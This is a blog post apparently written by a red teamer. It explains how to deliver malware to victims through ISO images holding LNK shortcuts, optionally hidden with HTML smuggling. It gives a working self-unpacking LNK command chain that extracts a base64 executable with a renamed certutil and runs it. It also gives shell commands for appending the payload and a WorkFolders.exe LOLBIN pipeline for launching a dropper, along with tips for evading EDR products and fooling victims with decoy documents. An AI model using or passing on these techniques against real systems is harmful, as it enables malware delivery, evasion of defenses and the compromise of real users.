simple-iso-lnk

# TL;DR ```c F:\quarterly_earnings_reportDec2021.lnk ``` This post describes the ISO+LNK delivery technique and provides relevant links and examples. > **update:** It seems that defenders are still catching up on the technique. Another self-unpacking .LNK example was posted recently, with powershell this time: https://www.x86matthew.com/view_post?id=embed_exe_lnk # intro *sidenote: everybody hates MSOffice and VBA, using .iso delivery is just an excuse to dodge having to write macros* It would be a stretch to say that MS Office attack surface is dying, especially when there's awesome current research in the field like Outflank's recent XLAM endeavors (https://outflank.nl/blog/2021/12/09/a-phishing-document-signed-by-microsoft/). However, for those of us who do not have capabilities or time for in-depth research, there are very limited options. We either have to pray our macros do not get detected by the latest and greatest EDR solution, use an unreliable 1-day RCE PoC, or rely on published previous research that is not exactly easy to modify past the point of EDR recognition. This is why, when you're frustrated enough, you look for other options. I've heard that many threat actors use ISO files, so we'll try and do exactly that. #### layout The main idea is basically this: ```j take a DLL/EXE -> make an LNK run it -> put everything in an ISO -> (optional) hide ISO with HTML smuggling ``` The actual payload is the part that I'll go deeper into later, for now we'll just assume that the dropper you use isn't detected, neither statically nor during runtime. Packing the ISO and HTML smuggling both are something that can be done with a single command with a right tool, so I'll skip over this as well. Easiest to use: https://github.com/Arno0x/EmbedInHTML -- HTML smuggling https://github.com/wikijm/PowerShell-AdminScripts/blob/master/Miscellaneous/New-IsoFile.ps1 -- ISO creation It should go without saying that VHD/CAB/ZIP are all viable alternatives to ISO, but the approach differs very slightly. This leaves us with a single task: creating the actual .LNK. # LNK files When creating a shortcut in Windows, we are presented with the following configuration options: ![[Pasted image 20211220161747.png]] Some of them are obvious, like changing the icon to something believable (I suggest shell32.dll if you're lazy to go look for them) and making it run minimized. However, the most important thing to do past fitting the file to your specific scenario is making sure the ~~.LNK starts in `%cd%`~~(this is a mistake, an empty field or something invalid would also work), which makes its working directory the mount point of the ISO. ![[Pasted image 20211220163035.png]] As it is a shortcut, we need to point it at something. ## approach ø. pointing it at your exe Too boring to cover, but may work against some EDRs. ¯\\_(ツ)_/¯ ## approach i. self-unpacking LNK **how-to** LNK is a format that does not care about what comes after marked content, and you can abuse that by appending data to it. I've used this partictular example in a campaign once (not for delivery, though): ```python # newlines and comments added for visibility %windir%\System32\cmd.exe /c copy pd_doc.lnk %TEMP%\r.tmp& # copy the lnk to TEMP for /r %windir%\System32\ %i in (*ertuti*.exe) do copy %i %TEMP%\D.exe /y& # copy certutil to TEMP # (to avoid calling it directly) findstr /b "TVqQ" %temp%\r.tmp>%temp%\A.tmp& # ^ grepping the LNK for our base64-encoded exe %temp%\D.exe -f -decode %temp%\A.tmp %temp%\F.scr& # decoding it with out certutil copy start %temp%\F.scr # running it ``` To prepare the payload, just run something similar to ```bash $ printf "\n\n" >> pd_doc.lnk $ cat loader.exe.b64 >> pd_doc.lnk ``` Then, feel free to add that to an ISO image. You can also try hiding the command parameters by tampering with the LNK structure itself (visible command line is 260 bytes, the actual limit is 4kB). **possible issues** - Base64-encoded exe is not exactly what you'd call stealthy or evasive - Same for megabyte-large LNKs - Same for LNKs with long commands in the filepath ## approach ii. LOLBINs **how-to** Using LOLBINs is a natural suggestion when you have a file format that can run a single command. You may be inclined to go with the standard: ```python C:\Windows\System32\rundll32.exe my.dll,Run # do not do this ``` However, during testing, we found out that many EDRs (looking at you, CrowdStrike) *really* don't like LNKs with parameters. Our solution was to use a LOLBIN that does not require parameters at all, like `C:\Windows\System32\WorkFolders.exe`. What it does (among other things) is running a file named `control.exe`, if it is present in the current directory. Thus, the pipeline looks like this: ```j create a dropper named control.exe -> make an LNK that points to WF and starts in %cd% -> put both into an ISO -> HTML smuggle the ISO to the victim ``` This approach has significantly lowered the detection rate for our LNKs, and they were not even blocked during runtime. However, this specific LOLBIN forces you to ship an EXE, which is not always desirable. The other option is using download+run LOLBINs, but: - chaining >=2 commands requires you to point to cmd.exe/powershell.exe, which is bad for evasion - using known download+execute stuff like MSHTA is prone to runtime blocking ## concerns aside execution If you go with this approach as your delivery method, spend some effort to make it a little bit more believable. - Make sure your dropper actually opens a decoy PDF/DOCX file, not to alert the victim - Also, try to create the image so that it does not only contain your malware - In general, consider matching your pretext with the delivery method (people do not often share CAB/ISO with each other) # credits Zajt for help with evasion testing https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/ for a self-unpacking example @ElliotKillick for the WorkFolders.exe tweet